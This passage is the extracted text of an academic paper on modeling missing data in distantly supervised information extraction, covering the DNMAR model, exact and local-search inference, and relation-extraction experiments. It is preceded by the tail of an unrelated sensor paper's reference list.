Force/Torque Measurement”, in IEEE Transactions on Industrial Electronics, vol. 35 pp. 26-30. February 1998. [3] C. Cristalli and M. R. Neuman, “A capacitive pressure sensor for measurement of interfacial pressure between a sphygmomanometer cuff and the arm," Engineering in Medicine and Biology Society, International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 99 1995., IEEE17th Annual Conference, Montreal, Que., 1995, pp. 1541-1542 vol.2. [4] L. Paredes-Madrid, L. Emmi and P. Gonzalez de Santos, "Improving the performance of piezoresistive force sensors by modeling sensor capacitance," 2010 IEEE International Symposium on Industrial Electronics, Bari, 2010, pp. 458-463.doi: 10.1109/ISIE.2010.5637681 [5] L. Jamone, L. Natale, G. Metta and G. Sandini, "Highly Sensitive Soft Tactile Sensors for an Anthropomorphic Robotic Hand," in IEEE Sensors Journal, vol. 15, no. 8, pp. 4226-4233, Aug. 2015. doi: 10.1109/JSEN.2015.2417759 [6] S. Boukhenous and M. Attari, "An easy made pinch grip sensor to quantify fingertip pressure," 2008 2nd International Conference on Signals, Circuits and Systems, Monastir, 2008, pp. 1-3. doi: 10.1109/ICSCS.2008.4746929 [7] D. Belavic et al., “Low energy consumption thick-_lm pressure sensors," Microelectronics and Packaging Conference, 2009. EMPC 2009.European, Rimini, 2009, pp. 1-6. [8] S. Shirafuji and K. Hosoda, “Detection and prevention of slip using sensors with different properties embedded in elastic artificial skin on the basis of previous experience," Advanced Robotics (ICAR), 201115th International Conference on, Tallinn, 2011, pp. 459-464. [9] A. Persichetti, F. Vecchi and M. C. Carrozza, “Optoelectronic Based Flexible Contact Sensor for Prosthetic Hand Application,"2007 IEEE 10th International Conference on Rehabilitation Robotics, Noordwijk, 2007, pp. 415-420. [10] P. H. Chappell, “Making sense of artificial hands,” Journal of Medical Engineering Technology, 2011, vol.35 [11] “QRE1113 PDF Datasheet Reflective Object Sensor”, Fairchildsemi.com, 2002. <https://www.fairchildsemi.com/products/optoelectronics/infrared/ref lective-sensors/QRE1113.html?keyword=QRE1113GR.> (01-Sep-2016). [12] “Perspex Design Guide - guidance for fabricators and designers. - Perspex", Perspex.co.uk. <http://www.perspex.co.uk/technical-library/brochures-and-workboo ks/perspex-design-guide/> (01- Sep- 2016). work_yrmvuqtjgjbyxdvawwajt7csp4 ---- Modeling Missing Data in Distant Supervision for Information Extraction Alan Ritter Machine Learning Department Carnegie Mellon University rittera@cs.cmu.edu Luke Zettlemoyer, Mausam Computer Sci. & Eng. University of Washington {lsz,mausam}@cs.washington.edu Oren Etzioni Vulcan Inc. Seattle, WA orene@vulcan.com Abstract Distant supervision algorithms learn informa- tion extraction models given only large read- ily available databases and text collections. Most previous work has used heuristics for generating labeled data, for example assum- ing that facts not contained in the database are not mentioned in the text, and facts in the database must be mentioned at least once. In this paper, we propose a new latent-variable approach that models missing data. This pro- vides a natural way to incorporate side in- formation, for instance modeling the intuition that text will often mention rare entities which are likely to be missing in the database. De- spite the added complexity introduced by rea- soning about missing data, we demonstrate that a carefully designed local search approach to inference is very accurate and scales to large datasets. Experiments demonstrate im- proved performance for binary and unary re- lation extraction when compared to learning with heuristic labels, including on average a 27% increase in area under the precision re- call curve in the binary case. 1 Introduction This paper addresses the issue of missing data (Lit- tle and Rubin, 1986) in the context of distant super- vision. The goal of distant supervision is to learn to process unstructured data, for instance to extract binary or unary relations from text (Bunescu and Mooney, 2007; Snyder and Barzilay, 2007; Wu and Weld, 2007; Mintz et al., 2009; Collins and Singer, 1999), using a large database of propositions as a Person EMPLOYER Bibb Latané UNC Chapel Hill Tim Cook Apple Susan Wojcicki Google True Positive “Bibb Latané, a professor at the University of North Carolina at Chapel Hill, published the theory in 1981.” False Positive “Tim Cook praised Apple’s record revenue...” False Negative “John P. McNamara, a professor at Washington State University’s Department of Animal Sciences...” Figure 1: A small hypothetical database and heuris- tically labeled training data for the EMPLOYER rela- tion. distant source of supervision. In the case of binary relations, the intuition is that any sentence which mentions a pair of entities (e1 and e2) that partici- pate in a relation, r, is likely to express the proposi- tion r(e1,e2), so we can treat it as a positive training example of r. Figure 1 presents an example of this process. One question which has received little attention in previous work is how to handle the situation where information is missing, either from the text corpus, or the database. As an example, suppose the pair of entities (John P. McNamara, Washington State Uni- versity) is absent from the EMPLOYER relation. In this case, the sentence in Figure 1 (and others which mention the entity pair) is effectively treated as a negative example of the relation. This is an issue 367 Transactions of the Association for Computational Linguistics, 1 (2013) 367–378. Action Editor: Kristina Toutanova. Submitted 7/2013; Revised 8/2013; Published 10/2013. c©2013 Association for Computational Linguistics. of practical concern, as most databases of interest are highly incomplete - this is the reason we need to extend them by extracting information from text in the first place. We need to be cautious in how we handle miss- ing data in distant supervision, because this is a case where data is not missing at random (NMAR). Whether a proposition is observed or missing in the text or database depends heavily on its truth value: given that it is true we have some chance to ob- serve it, however we do not observe those which are false. To address this challenge, we propose a joint model of extraction from text and the process by which propositions are observed or missing in both the database and text. Our approach provides a natural way to incorporate side information in the form of a missing data model. For instance, popular entities such as Barack Obama already have good coverage in Freebase, so new extractions are more likely to be errors than those involving rare entities with poor coverage. Our approach to missing data is general and can be combined with various IE solutions. As a proof of concept, we extend MultiR (Hoffmann et al., 2011), a recent model for distantly supervised information extraction, to explicitly model missing data. These extensions complicate the MAP inference problem which is used as a subroutine in learning. This motivated us to explore a variety of approaches to inference in the joint extraction and missing data model. We explore both exact inference based on A* search and efficient approximate inference using local search. Our experiments demonstrate that with a carefully designed set of search operators, local search produces optimal solutions in most cases. Experimental results demonstrate large perfor- mance gains over the heuristic labeling strategy on both binary relation extraction and weakly super- vised named entity categorization. For example our model obtains a 27% increase in area under the pre- cision recall curve on the sentence-level relation ex- traction task. 2 Related Work There has been much interest in distantly su- pervised1 training of relation extractors using 1also referred to as weakly supervised databases. For example, Craven and Kumlien (1999) build a heuristically labeled dataset, using the Yeast Protein Database to label Pubmed abstracts with the subcellular-localization relation. Wu and Weld (2007) heuristically annotate Wikipedia articles with facts mentioned in the infoboxes, enabling auto- mated infobox generation for articles which do not yet contain them. Benson et. al. (2011) use a database of music events taking place in New York City as a source of distant supervision to train event extractors from Twitter. Mintz et. al. (2009) used a set of relations from Freebase as a distant source of supervision to learn to extract information from Wikipedia. Ridel et. al. (2010), Hoffmann et. al. (2011), and Surdeanu et. al. (2012) presented a series of models casting distant supervision as a multiple-instance learning problem (Dietterich et al., 1997). Recent work has begun to address the challenge of noise in heuristically labeled training data gen- erated by distant supervision, and proposed a va- riety of strategies for correcting erroneous labels. Takamatsu et al. (2012) present a generative model of the labeling process, which is used as a pre- processing step for improving the quality of labels before training relation extractors. Independently, Xu et. al. (2013) analyze a random sample of 1834 sentences from the New York Times, demon- strating that most entity pairs expressing a Freebase relation correspond to false negatives. They apply pseudo-relevance feedback to add missing entries in the knowledge base before applying the MultiR model (Hoffmann et al., 2011). Min et al. (2013) extend the MIML model of Surdeanu et. al. (2012) using a semi-supervised approach assuming a fixed proportion of true positives for each entity pair. The Min et al. (2013) approach is perhaps the most closely related of the recent approaches for dis- tant supervision. However, there are a number of key differences: (1) They impose a hard constraint on the proportion of true positive examples for each entity pair, whereas we jointly model relation extrac- tion and missing data in the text and KB. (2) They only handle the case of missing information in the database and not in the text. (3) Their model, based on Surdeanu (2012), uses hard discriminative EM to tune parameters, whereas we use perceptron-style updates. (4) We evaluate various inference strategies 368 for exact and approximate inference. The issue of missing data has been extensively studied in the statistical literature (Little and Rubin, 1986; Gelman et al., 2003). Most methods for han- dling missing data assume that variables are missing at random (MAR): whether a variable is observed does not depend on its value. In situations where the MAR assumption is violated (for example dis- tantly supervised information extraction), ignoring the missing data mechanism will introduce bias. In this case it is necessary to jointly model the process of interest (e.g. information extraction) in addition to the missing data mechanism. Another line of related work is iterative semantic bootstrapping (Brin, 1999; Agichtein and Gravano, 2000). Carlson et. al. (2010) exploit constraints be- tween relations to reduce semantic drift in the boot- strapping process; such constraints are potentially complementary to our approach of modeling miss- ing data. 3 A Latent Variable Model for Distantly Supervised Relation Extraction In this section we review the MultiR model (due to Hoffmann et. al. (2011)) for distant supervision in the context of extracting binary relations. This model is extended to handle missing data in Section 4. We focus on binary relations to keep discussions concrete; unary relation extraction is also possible. Given a set of sentences, s = s1,s2, . . . ,sn, which mention a specific pair of entities (e1 and e2) our goal is to correctly predict which relation is mentioned in each sentence, or “NA” if none of the relations under consideration are mentioned. Un- like the standard supervised learning setup, we do not observe the latent sentence-level relation men- tion variables, z = z1,z2, . . . ,zn.2 Instead we only observe aggregate binary variables for each rela- tion, d = d1,d2, . . . ,dk, which indicate whether the proposition rj(e1,e2) is present in the database (Freebase). Of course the question which arises is: how do we relate the aggregate-level variables, dj, to the sentence-level relation mentions, zi? A sensi- ble answer to this question is a simple deterministic- OR function. The deterministic-OR states that if 2These variables indicate which relation is mentioned be- tween e1 and e2 in each sentence. there exists at least one i such that zi = j, then dj = 1. For example, if at least one sentence men- tions that “Barack Obama was born in Honolulu”, then that fact is true in aggregate, if none of the sen- tences mentions the relation, then the fact is assumed false. The model also makes the converse assump- tion: if Freebase contains the relation BIRTHLOCA- TION(Barack Obama, Honolulu), then we must ex- tract it from at least one sentence. A summary of this model, which is due to Hoffmann et. al. (2011), is presented in Figure 2. 3.1 Learning To learn the parameters of the sentence-level rela- tion mention classifier, θ, we maximize the likeli- hood of the facts observed in Freebase conditioned on the sentences in our text corpus: θ∗ = arg max θ P(d|s;θ) = arg max θ ∏ e1,e2 ∑ z P(z,d|s;θ) Here the conditional likelihood of a given entity pair is defined as follows: P(z,d|s;θ) = n∏ i=1 φ(zi,si;θ)× k∏ j=1 ω(z,dj) = n∏ i=1 eθ·f(zi,si) × k∏ j=1 1¬dj⊕∃i:j=zi Where 1x is an indicator variable which takes the value 1 if x is true and 0 otherwise, the ω(z,dj) factors are hard constraints corresponding to the deterministic-OR function, and f(zi,si) is a vector of features extracted from sentence si and relation zi. An iterative gradient-ascent based approach is used to tune θ using a latent-variable perceptron- style additive update scheme (Collins, 2002; Liang et al., 2006; Zettlemoyer and Collins, 2007). The gradient of the conditional log likelihood, for a sin- gle pair of entities, e1 and e2, is as follows:3 ∂ log P(d|s;θ) ∂θ = EP(z|s,d;θ)   ∑ j f(sj,zj)   −EP(z,d|s;θ)   ∑ j f(sj,zj)   3For details see Koller and Friedman (2009), Chapter 20. 369 𝑠1 𝑠2 𝑠3 … 𝑠𝑛 𝑧1 𝑧2 𝑧3 … 𝑧𝑛 𝑑1 𝑑2 𝑑𝑘 … Local Extractors Deterministic OR (Barack Obama, Honolulu) Sentences Aggregate Relations (Born-In, Lived-In, children, etc…) 𝑃 𝑧𝑖 = 𝑟 𝑠𝑖 ∝ exp⁡(𝜃 ⋅ 𝑓 𝑠𝑖, 𝑟 ) Relation mentions Figure 2: MultiR (Hoffmann et. al. 2011) 𝑠1 𝑠2 𝑠3 … 𝑠𝑛 𝑧1 𝑧2 𝑧3 … 𝑧𝑛 𝑡1 𝑡2 𝑡𝑘 … Mentioned in DB 𝑑1 𝑑2 𝑑𝑘 … Mentioned in Text Figure 3: DNMAR These expectations are too difficult to compute in practice, so instead they are approximated as maxi- mizations. Computing this approximation to the gra- dient requires solving two inference problems corre- sponding to the two maximizations: z∗DB = arg max z P(z|s,d;θ) z∗ = arg max z P(z,d|s;θ) The MAP solution for the second term is easy to compute: because d and z are deterministically re- lated, we can simply find the highest scoring re- lation, r, for each sentence, si, according to the sentence-level factors, φ, independently. The first term, is more difficult, however, as this requires find- ing the best assignment to the sentence-level hidden variables z = z1 . . .zn conditioned on the observed sentences and facts in the database. Hoffmann et. al. (2011) show how this reduces to a well-known weighted edge cover problem which can be solved exactly in polynomial time. 4 Modeling Missing Data The model presented in Section 3 makes two as- sumptions which correspond to hard constraints: 1. If a fact is not found in the database it cannot be mentioned in the text. 2. If a fact is in the database, it must be mentioned in at least one sentence. These assumptions drive the learning, however if there is information missing from either the text or the database this leads to errors in the training data (false positives, and false negatives respectively). In order to gracefully handle the problem of miss- ing data, we propose to extend the model presented in Section 3 by splitting the aggregate level vari- ables, d, into two parts: t which represents whether a fact is mentioned in the text (in at least one sen- tence), and d′ which represents whether the fact is mentioned in the database. We introduce pair- wise potentials ψ(tj,dj) which penalize disagree- ment between tj and dj, that is: ψ(tj,dj) =    −αMIT if tj = 0 and dj = 1 −αMID if tj = 1 and dj = 0 0 otherwise Where αMIT (Missing In Text) and αMID (Missing In Database) are parameters of the model which can be understood as penalties for missing information in the text and database respectively. We refer to this model as DNMAR (for Distant Supervision with Data Not Missing At Random). A graphical model representation is presented in Figure 3. This model can be understood as relaxing the two hard constraints mentioned above into soft con- straints. As we show in Section 7, simply relaxing these hard constraints into soft constraints and set- ting the two parameters αMIT, and αMID by hand on development data results in a large improvement to precision at comparable recall over MultiR on two different applications of distant supervision: binary relation extraction and named entity categorization. Inference in this model becomes more challeng- ing however, because the constrained inference problem no longer reduces to a weighted edge cover problem as before. In Section 5, we present an infer- ence technique for the new model which is time and 370 memory efficient and almost always finds an exact MAP solution. The learning proceeds analogously to what was described in section 3.1, with the exception that we now maximize over the additional aggregate-level hidden variables t, which have been introduced. As before, MAP inference is a subroutine in learning, both for the unconstrained case corresponding to the second term (which is again trivial to compute), and for the constrained case which is more challenging as it no longer reduces to a weighted edge cover problem as before. 5 MAP Inference The only difference in the new inference problem is the addition of t; z and t are deterministically re- lated, so we can simply find a MAP assignment to z, from which t follows. The resulting inference prob- lem can be viewed as optimization under soft con- straints, where the objective includes terms for each fact not in Freebase which is extracted from the text: −αMID, and an effective reward for extracting a fact which is contained in Freebase: αMIT. The solution to the MAP inference problem is the value of z which maximizes the following objective: z∗DB = arg max z P(z|d;θ,α) = arg max z n∑ i=1 θ ·f(zi,si) (1) + k∑ j=1 ( αMIT1dj∧∃i:j=zi −αMID1¬dj∧∃i:j=zi ) Whether we choose to set the parameters αMIT and αMID to fixed values (Section 4), or incorporate side information through a missing data model (Sec- tion 6), inference becomes more challenging than in the model where facts observed in Freebase are treated as hard constraints (Section 3); the hard con- straints are equivalent to setting αMID = αMIT = ∞. We now present exact and approximate ap- proaches to inference. Standard search methods such as A* and branch and bound have high com- putation and memory requirements and are there- fore only feasible on problems with few variables; they are, however, guaranteed to find an optimal so- lution.4 Approximate methods scale to large prob- 4Each entity pair defines an inference problem where the lem sizes, but we loose the guarantee of finding an optimal solution. After showing how to find guaran- teed exact solutions for small problem sizes (e.g. up to 200 variables), we present an inference algorithm based on local search which is empirically shown to find optimal solutions in almost every case by com- paring its solutions to those found by A*. 5.1 A* Search We cast exact MAP inference in the DNMAR model as an application of A* search. Each partial hypoth- esis, h, in the search space corresponds to a par- tial assignment of the first m variables in z; to ex- pand a hypothesis, we generate k new hypotheses, where k is the total number of relations. Each new hypothesis h′ contains the same partial assignment to z1, . . . ,zm as h, with each h′ having a different value of zm+1 = r. A* operates by maintaining a priority queue of hypotheses to expand, with each hypothesis’ priority determined by an admissible heuristic. The heuristic represents an upper bound on the score of the best solution with h’s partial variable assignment under the objective from Equation 1. In general, a tighter upper bound corresponds to a better heuristic and faster solutions. To upper bound our objective, we start with the φ(zi,si) factors from the partial as- signment. Unassigned variables (i > k), are set to their maximum possible value, zi = maxr φ(r,si) independently. Next to account for the effect the aggregate ψ(tj,dj) factors on the unassigned vari- ables, we consider independently changing each unassigned zi variable for each ψ(tj,dj) factor to improve the overall score. This approach can lead to inconsistencies, but provides us with a good upper bound for the best possible solution with a partial assignment to z1, . . . ,zk. 5.2 Local Search While A* is guaranteed to find an exact solution, its time and memory requirements prohibit use on large problems involving many variables. As a more scal- able alternative we propose a greedy hill climbing method (Russell et al., 1996), which starts with a full assignment to z, and repeatedly moves to the best neighboring solution z′ according to the objective in number of variables is equal to the number of sentences which mention the pair. 371 Equation 1. The neighborhood of z is defined by a set of search operators. If none of the neighboring solutions has a higher score, then we have reached a (local) maximum at which point the algorithm ter- minates with the current solution which may or may not correspond to a global maximum. This process is repeated using a number of random restarts, and the best local maximum is returned as the solution. Search Operators: We start with a standard search operator, which considers changing each relation-mention variable, zi, individually to maxi- mize the overall score. At each iteration, all zis are considered, and the one which produces the largest improvement to the overall score is changed to form the neighboring solution, z′. Unfortunately, this definition of the solution neighborhood is prone to poor local optima because it is often required to traverse many low scoring states before changing one of the aggregate variables, tj, and achieving a higher score from the associated aggregate factor, ψ(tj,dj). For example, consider a case where the proposition r(e1,e2) is not in Freebase, but is men- tioned many times in the text, and imagine the cur- rent solution contains no mention zi = r. Any neighboring solution which assigns a mention to r will include the penalty αMID, which could out- weigh the benefit from changing any individual zi to r: φ(r,si) −φ(zi,si). If multiple mentions were changed to r however, together they could outweigh the penalty for extracting a fact not in Freebase, and produce an overall higher score. To avoid the problem of getting stuck in local optima, we propose an additional search operator which considers changing all variables, zi, which are currently assigned to a specific relation r, to a new relation r′, resulting in an additional (k − 1)2 possible neighbors, in addition to the n × (k − 1) neighbors which come from the standard search op- erator. This aggregate-level search operator allows for more global moves which help to avoid local op- tima, similar to the type-level sampling approach for MCMC (Liang et al., 2010). At each iteration, we consider all n × (k − 1) + (k−1)2 possible neighboring solutions generated by both search operators, and pick the one with biggest overall improvement, or terminate the algorithm if no improvements can be made over the current so- lution. 20 random restarts were used for each infer- ence problem. We found this approach to almost al- ways find an optimal solution. In over 100,000 prob- lems with 200 or fewer variables from the New York Times dataset used in Section 7, an optimal solu- tion was missed in only 3 cases which was verified by comparing against optimal solutions found using A*. Without including the aggregate-level search operator, local search almost always gets stuck in a local maximum. 6 Incorporating Side Information In Section 4, we relaxed the hard constraints made by MultiR, which allows for missing information in either the text or database, enabling errors in the distantly supervised training data to be naturally corrected as a side-effect of learning. We made the simplifying assumption, however, that all facts are equally likely to be missing from the text or database, which is encoded in the choice of 2 fixed parameters αMIT, and αMID. Is it possible to im- prove performance by incorporating side informa- tion in the form of a missing data model (Little and Rubin, 1986), taking into account how likely each fact is to be observed in the text and the database conditioned on its truth value? In our setting, the missing data model corresponds to choosing the val- ues of αMIT and αMID dynamically based on the en- tities and relations involved. Popular Entities: Consider two entities: Barack Obama, the 44th president of the United States, and Donald Parry, a professional rugby league footballer of the 1980s.5 Since Obama is much more well- known than Parry, we wouldn’t be very surprised to see information missing from Freebase about Parry, but it would seem odd if true propositions were miss- ing about Obama. We can encode these intuitions by choosing entity-specific values of αMID: α (e1,e2) MID = −γ min (c(e1),c(e2)) where c(ei) is the number of times ei appears in Freebase, which is used as an estimate of its cov- erage. Well Aligned Relations: Given that a pair of en- tities, e1 and e2, participating in a Freebase relation, 5http://en.wikipedia.org/wiki/Donald_ Parry 372 r, appear together in a sentence si, the chance that si expresses r varies greatly depending on r. For example, if a sentence mentions a pair of entities which participate in both the COUNTRYCAPITOL relation and the LOCATIONCONTAINS relation (for example Moscow and Russia), it is more likely that the a random sentence will express LOCATIONCON- TAINS than COUNTRYCAPITOL. We can encode this preference for matching cer- tain relations over others by setting αrMIT on a per-relation basis. We choose a different value of αrMIT for each relation based on quick inspec- tion of the data, and estimating the number of true positives. Relations such as contains, place lived, and nationality which contain a large number of true positive matches are assigned a large value of αrMIT = γlarge, those with a medium number such as capitol, place of death and administrative divisions were assigned a medium value γmedium, and those relations with few matches were assigned a small value γsmall. These 3 parameters were tuned on held out development data. 7 Experiments In Section 5, we presented a scalable approach to inference in the DNMAR model which almost al- ways finds an optimal solution. Of course the real question is: does modeling missing data improve performance at extracting information from text? In this section we present experimental results showing large improvements in both precision and recall on two distantly supervised learning tasks: binary rela- tion extraction and named entity categorization. 7.1 Binary Relation Extraction For the sake of comparison to previous work we evaluate performance on the New York Times text, features and Freebase relations developed by Riedel et. al. (2010) which was also used by Hoffmann et. al. (2011). This dataset is constructed by extracting named entities from 1.8 million New York Times ar- ticles, which are then match against entities in Free- base. Sentences which contain pairs of entities par- ticipating in one or more relations are then used as training examples for those relations. The sentence- level features include word sequences appearing in context with the pair of entities, in addition to part of speech sequences, and dependency paths from the Malt parser (Nivre et al., 2004). 7.1.1 Baseline To evaluate the effect of modeling missing data in distant supervision, we compare against the Mul- tiR model for distant supervision (Hoffmann et al., 2011), a state of the art approach for binary rela- tion extraction which is the most similar previous work, and models facts in Freebase as hard con- straints disallowing the possibility of missing infor- mation in either the text or the database. To make our experiment as controlled as possible and rule- out the possibility of differences in performance due to implementation details, we compare against our own re-implementation of MultiR which reproduces Hoffmann et. al.’s performance, and shares as much code as possible with the DNMAR model. 7.1.2 Experimental Setup We evaluate binary relation extraction using two evaluations. We first evaluate on a sentence-level extraction task using a manually annotated dataset provided by Hoffmann et. al. (2011).6 This dataset consists of sentences paired with human judgments on whether each expresses a specific relation. Sec- ondly, we perform an automatic evaluation which compares propositions extracted from text against held-out data from Freebase. 7.1.3 Results Sentential Extraction: Figure 4 presents preci- sion and recall curves for the sentence-level relation extraction task on the same manually annotated data presented by Hoffmann et. al. (2011). By explic- itly modeling the possibility of missing information in both the text and the database we achieve a 17% increase in area under the precision recall curve. In- corporating additional side information in the form of a missing data model, as described in Section 6, produces even better performance, yielding a 27% increase over the baseline in area under the curve. We also compare against the system described by Xu et. al. (2013) (hereinafter called Xu13). To do this, we trained our implementation of MultiR on 6http://raphaelhoffmann.com/mr/ 373 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 recall p re ci si o n MultiR Xu13 DNMAR DNMAR* Figure 4: Overall precision and Recall at the sentence-level extraction task comparing against human judgments. DNMAR∗ incorporates side- information as discussed in Section 6. the labels predicted by their Pseudo-relevance Feed- back model. 7 The differences between each pair of systems, except DNMAR and Xu138, is significant with p-value less than 0.05 according to a paired t- test assuming a normal distribution. Per-relation precision and recall curves are pre- sented in Figure 6. For certain relations, for instance /location/us state/capital, there simply isn’t enough overlap between the information contained in Free- base and facts mentioned in the text to learn any- thing useful. For these relations, entity pair matches are unlikely to actually express the relation; for in- stance, in the following sentence from the data: NHPF , which has its Louisiana office in Baton Rouge , gets the funds ... although Baton Rouge is the capital of Louisiana, the /location/us state/capital relation is not ex- pressed in this sentence. Another interesting ob- servation which we can make from Figure 6, is that the benefit from modeling missing data 7We thank Wei Xu for making this data available. 8DNMAR has a 1.3% increase in AUC over Xu13, though this difference is not significant according to a paired t-test. DNMAR* achieves a 10% increase in AUC over Xu13 which is significant. 0.00 0.05 0.10 0.15 0.20 0.25 0.30 0.35 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 recall p re ci si o n MultiR DNMAR DNMAR* Figure 5: Aggregate-level automatic evaluation comparing against held-out data from Freebase. DNMAR∗ incorporates side-information as dis- cussed in Section 6. varies from one relation to another. Some re- lations, for instance /people/person/place of birth, have relatively good coverage in both Freebase and the text, and therefore we do not see as much gain from modeling missing data. Other rela- tions, such as /location/location/contains, and /peo- ple/person/place lived have poorer coverage making our missing data model very beneficial. Aggregate Extraction: Following previous work, we evaluate precision and recall against held- out data from Freebase in Figure 5. As mentioned by Mintz et. al. (2009), this automatic evaluation un- derestimates precision because many facts correctly extracted from the text are missing in the database and therefore judged as incorrect. Riedel et. al. (2013) further argues that this evaluation is biased because frequent entity pairs are more likely to con- tain facts in Freebase, so systems which rank extrac- tions involving popular entities higher will achieve better performance independently of how accurate their predictions are. Indeed in Figure 5 we see that the precision of our system which models missing data is generally lower than the system which as- sumes no data is missing from Freebase, although we do roughly double the recall. By better modeling 374 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 business_company_founders recall p re ci si o n 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 business_person_company recall p re ci si o n 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 location_country_administrative_divisions recall p re ci si o n 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 location_country_capital recall p re ci si o n 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 location_location_contains recall p re ci si o n 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 location_neighborhood_neighborhood_of recall p re ci si o n 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 location_us_state_capital recall p re ci si o n 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 people_deceased_person_place_of_death recall p re ci si o n 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 people_person_children recall p re ci si o n 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 people_person_nationality recall p re ci si o n 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 people_person_place_lived recall p re ci si o n 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 people_person_place_of_birth recall p re ci si o n Figure 6: Per-relation precision and recall on the sentence-level relation extraction task. The dashed line corresponds to MultiR, DNMAR is the solid line, and DNMAR*, which incorporates side-information, is represented by the dotted line. 375 missing data we achieve lower precision on this au- tomatic held-out evaluation as the system using hard constraints is explicitly trained to predict facts which occur in Freebase (not those which are mentioned in the text but unlikely to appear in the database). 7.2 Named Entity Categorization As mentioned previously, the problem of missing data in distant (weak) supervision is a very general issue; so far we have investigated this problem in the context of extracting binary relations using distant supervision. We now turn to the problem of weakly supervised named entity recognition (Collins and Singer, 1999; Talukdar and Pereira, 2010). 7.2.1 Experimental Setup To demonstrate the effect of modeling missing data in the distantly supervised named entity cate- gorization task, we adapt the MultiR and DNMAR models to the Twitter named entity categorization dataset which was presented by Ritter et. al. (2011). The models described so far are applied unchanged: rather than modeling a set of relations in Freebase between a pair of entities, e1 and e2, we now model a set of possible Freebase categories associated with a single entity e. This is a natural extension of dis- tant supervision from binary to unary relations. The unlabeled data and features described by Ritter et. al. (2011) are used for training the model, and their manually annotated Twitter named entity dataset is used for evaluation. 7.2.2 Results Precision and recall at weakly supervised named entity categorization comparing MultiR against DN- MAR is presented in Figure 7. We observe substan- tial improvement in precision at comparable recall by explicitly modeling the possibility of missing in- formation in the text and database. The missing data model leads to a 107% increase in area under the precision-recall curve (from 0.16 to 0.34), but still falls short of the results presented by Ritter et. al. (2011). Intuitively this makes sense, because the model used by Ritter et. al. is based on latent Dirich- let allocation which is better suited to this highly am- biguous unary relation data. 0.0 0.2 0.4 0.6 0.8 1.0 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 recall p re ci si o n NER_MultiR NER_DNMAR Figure 7: Precision and Recall at the named entity categorization task 8 Conclusions In this paper we have investigated the problem of missing data in distant supervision; we introduced a joint model of information extraction and miss- ing data which relaxes the hard constraints used in previous work to generate heuristic labels, and pro- vides a natural way to incorporate side information through a missing data model. Efficient inference breaks in the new model, so we presented an ap- proach based on A* search which is guaranteed to find exact solutions, however exact inference is not computationally tractable for large problems. To ad- dress the challenge of large problem sizes, we pro- posed a scalable inference algorithm based on local search, which includes a set of aggregate search op- erators allowing for long-distance jumps in the so- lution space to avoid local maxima; this approach was experimentally demonstrated to find exact so- lutions in almost every case. Finally we evaluated the performance of our model on the tasks of binary relation extraction and named entity categorization showing large performance gains in each case. In future work we would like to apply our ap- proach to modeling missing data to additional mod- els, for instance the model of Surdeanu et. al. (2012) and Ritter et. al. (2011), and also explore new miss- ing data models. 376 Acknowledgements The authors would like to thank Dan Weld, Chris Quirk, Raphael Hoffmann and the anonymous re- viewers for helpful comments. Thanks to Wei Xu for providing data. This research was supported in part by ONR grant N00014-11-1-0294, DARPA contract FA8750-09- C-0179, a gift from Google, a gift from Vulcan Inc., and carried out at the Univer- sity of Washington’s Turing Center. References Eugene Agichtein and Luis Gravano. 2000. Snowball: Extracting relations from large plain-text collections. In Proceedings of the fifth ACM conference on Digital libraries. Edward Benson, Aria Haghighi, and Regina Barzilay. 2011. Event discovery in social media feeds. In Pro- ceedings of ACL. Sergey Brin. 1999. Extracting patterns and relations from the world wide web. In The World Wide Web and Databases. Razvan Bunescu and Raymond Mooney. 2007. Learning to extract relations from the web using minimal super- vision. In ACL. Andrew Carlson, Justin Betteridge, Bryan Kisiel, Burr Settles, Estevam R Hruschka Jr, and Tom M Mitchell. 2010. Toward an architecture for never-ending lan- guage learning. In Proceedings of AAAI. Michael Collins and Yoram Singer. 1999. Unsupervised models for named entity classification. In EMNLP. Michael Collins. 2002. Discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. In Proceedings of EMNLP. Mark Craven, Johan Kumlien, et al. 1999. Constructing biological knowledge bases by extracting information from text sources. In ISMB. Thomas G Dietterich, Richard H Lathrop, and Tomás Lozano-Pérez. 1997. Solving the multiple instance problem with axis-parallel rectangles. Artificial Intel- ligence. Andrew Gelman, John B Carlin, Hal S Stern, and Don- ald B Rubin. 2003. Bayesian data analysis. CRC press. Raphael Hoffmann, Congle Zhang, Xiao Ling, Luke Zettlemoyer, and Daniel S. Weld. 2011. Knowledge- based weak supervision for information extraction of overlapping relations. In Proceedings of ACL-HLT. D. Koller and N. Friedman. 2009. Probabilistic Graphi- cal Models: Principles and Techniques. MIT Press. Percy Liang, Alexandre Bouchard-Côté, Dan Klein, and Ben Taskar. 2006. An end-to-end discriminative ap- proach to machine translation. In Proceedings of ACL. Percy Liang, Michael I Jordan, and Dan Klein. 2010. Type-based mcmc. In Proceedings of ACL. Roderick J A Little and Donald B Rubin. 1986. Statis- tical analysis with missing data. John Wiley & Sons, Inc., New York, NY, USA. Bonan Min, Ralph Grishman, Li Wan, Chang Wang, and David Gondek. 2013. Distant supervision for rela- tion extraction with an incomplete knowledge base. In Proceedings of 